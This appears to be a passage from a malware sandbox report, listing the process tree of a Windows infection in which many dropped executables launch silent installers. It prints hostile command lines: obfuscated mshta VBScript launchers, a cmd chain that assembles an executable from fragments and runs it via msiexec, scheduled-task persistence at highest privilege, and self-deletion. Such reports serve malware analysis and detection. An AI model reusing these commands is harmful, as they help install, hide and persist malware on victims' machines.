C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe"C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe"4⤵PID:5296
-
-
C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"4⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp"C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp" /SL5="$3030E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"5⤵PID:5620
-
C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe" /S /UID=27096⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe"C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe"7⤵PID:4884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive & exit8⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive9⤵PID:7384
-
C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive10⤵PID:7436
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=798 & exit8⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exeC:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=7989⤵PID:3816
-
C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp" /SL5="$10398,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe" /silent /subid=79810⤵PID:6168
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵PID:3684
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵PID:6252
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:2196
-
C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exeC:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654"9⤵PID:6412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe & exit8⤵PID:6324
-
C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exeC:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe9⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe"C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe" -u10⤵PID:8036
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe & exit8⤵PID:7580
-
C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exeC:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe9⤵PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive & exit8⤵PID:4284
-
C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive9⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive10⤵PID:5292
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S & exit8⤵PID:6220
-
C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S9⤵PID:3328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9FC3.tmp\tempfile.ps1"10⤵PID:7092
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=654 & exit8⤵PID:7588
-
C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exeC:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=6549⤵PID:7920
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe"C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe"4⤵PID:5672
-
C:\Users\Admin\AppData\Roaming\Traffic\setup.exeC:\Users\Admin\AppData\Roaming\Traffic\setup.exe -cid= -sid= -silent=15⤵PID:7460
-
C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe"C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" "--KGyYl1v"6⤵PID:7848
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4024
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe"C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1280
-
-
C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe"C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe"2⤵
- Executes dropped EXE
PID:1740 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6603⤵
- Program crash
PID:4612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6763⤵
- Program crash
PID:4936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6803⤵
- Program crash
PID:5100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6923⤵
- Program crash
PID:4172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 7523⤵
- Program crash
PID:3612
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe"C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe"2⤵
- Executes dropped EXE
PID:2052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe" & del C:\ProgramData\*.dll & exit3⤵PID:2208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f4⤵
- Kills process with taskkill
PID:4060
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3064
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe"C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"3⤵
- Executes dropped EXE
PID:3508
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵
- Executes dropped EXE
PID:3388
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵
- Executes dropped EXE
PID:3108
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe"C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2888 -
C:\Users\Admin\AppData\Roaming\2045521.exe"C:\Users\Admin\AppData\Roaming\2045521.exe"3⤵PID:4048
-
-
C:\Users\Admin\AppData\Roaming\7310357.exe"C:\Users\Admin\AppData\Roaming\7310357.exe"3⤵PID:1520
-
C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe"C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe"4⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Roaming\4682617.exe"C:\Users\Admin\AppData\Roaming\4682617.exe"3⤵PID:4216
-
-
C:\Users\Admin\AppData\Roaming\4183110.exe"C:\Users\Admin\AppData\Roaming\4183110.exe"3⤵PID:4376
-
-
C:\Users\Admin\AppData\Roaming\4340187.exe"C:\Users\Admin\AppData\Roaming\4340187.exe"3⤵PID:4428
-
C:\Users\Admin\AppData\Roaming\8115156.exe"C:\Users\Admin\AppData\Roaming\8115156.exe"4⤵PID:3168
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Roaming\8115156.exe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If """" =="""" for %J IN ( ""C:\Users\Admin\AppData\Roaming\8115156.exe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )5⤵PID:4784
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Roaming\8115156.exe" 96I39AZEjeY.eXe&&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "" =="" for %J IN ( "C:\Users\Admin\AppData\Roaming\8115156.exe" ) do taskkill /f /iM "%~nxJ"6⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C87⤵PID:4172
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If ""/pHUW_5J4~bwUgHE59AL0C8 "" =="""" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )8⤵PID:5228
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" 96I39AZEjeY.eXe&&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "/pHUW_5J4~bwUgHE59AL0C8 " =="" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" ) do taskkill /f /iM "%~nxJ"9⤵PID:5448
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRiPt: ClOSE( CreATEobJeCt ( "WScRipT.sHELL" ).run ( "CMD /Q /C ECHo | Set /P = ""MZ"" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 + 8IocY82.AK +QsN7PDR.gG + 4BRi.S xW5LDH.~rl & dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl " ,0 , tRUE ) )8⤵PID:5304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ECHo | Set /P = "MZ" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 +8IocY82.AK +QsN7PDR.gG + 4BRi.S xW5LDH.~rl&dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl9⤵PID:5496
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHo "10⤵PID:5468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>sGRrCYU.nK0"10⤵PID:5660
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y .\Xw5LDH.~Rl10⤵PID:5904
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "8115156.exe"7⤵
- Kills process with taskkill
PID:5208
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\3860801.exe"C:\Users\Admin\AppData\Roaming\3860801.exe"4⤵PID:2128
-
-
-
C:\Users\Admin\AppData\Roaming\8320134.exe"C:\Users\Admin\AppData\Roaming\8320134.exe"3⤵PID:4460
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6uHEVhTPtit6lTxg8fV0eD2N.exe"C:\Users\Admin\Pictures\Adobe Films\6uHEVhTPtit6lTxg8fV0eD2N.exe"2⤵
- Executes dropped EXE
PID:1912
-
-
C:\Users\Admin\Pictures\Adobe Films\9WIJtxlsgOIp2HQf2t6RZdoY.exe"C:\Users\Admin\Pictures\Adobe Films\9WIJtxlsgOIp2HQf2t6RZdoY.exe"2⤵
- Executes dropped EXE
PID:2324
-
-
C:\Users\Admin\Pictures\Adobe Films\YlM8f8ZYF7ZBWfH06sVqXVME.exe"C:\Users\Admin\Pictures\Adobe Films\YlM8f8ZYF7ZBWfH06sVqXVME.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Users\Admin\Pictures\Adobe Films\gVf6IXUmOOirYKM8eOhB0zv0.exe"C:\Users\Admin\Pictures\Adobe Films\gVf6IXUmOOirYKM8eOhB0zv0.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3796
-
-
C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"2⤵PID:4800
-
C:\Users\Admin\AppData\Local\Temp\is-UL603.tmp\QNyE0BtC_KBk23BTZGqAjwbR.tmp"C:\Users\Admin\AppData\Local\Temp\is-UL603.tmp\QNyE0BtC_KBk23BTZGqAjwbR.tmp" /SL5="$501F6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"3⤵PID:4920
-
C:\Users\Admin\AppData\Local\Temp\is-6AJI6.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-6AJI6.tmp\lakazet.exe" /S /UID=27094⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\01-9f277-76c-738a7-d05807033e9e2\Rucudeshaepu.exe"C:\Users\Admin\AppData\Local\Temp\01-9f277-76c-738a7-d05807033e9e2\Rucudeshaepu.exe"5⤵PID:5772
-
-
C:\Users\Admin\AppData\Local\Temp\ff-73ebf-412-599ac-8bd67f0ae246d\Jelelicaenu.exe"C:\Users\Admin\AppData\Local\Temp\ff-73ebf-412-599ac-8bd67f0ae246d\Jelelicaenu.exe"5⤵PID:5912
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exe & exit6⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exeC:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exe7⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\Install1.exeC:\Users\Admin\AppData\Local\Temp\Install1.exe8⤵PID:6048
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exe /silent & exit6⤵PID:6812
-
C:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exeC:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exe /silent7⤵PID:2056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XWIJVGMLGG\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\XWIJVGMLGG\foldershare.exe" /VERYSILENT5⤵PID:6084
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6796 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6828
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:7012
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3064
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7492
-
C:\Users\Admin\AppData\Local\Temp\84F6.exeC:\Users\Admin\AppData\Local\Temp\84F6.exe1⤵PID:8020
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:6248
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1112
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DBD607D2C4D439583F58E73FC9DE3D1A C2⤵PID:7076
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6392 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7172
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5548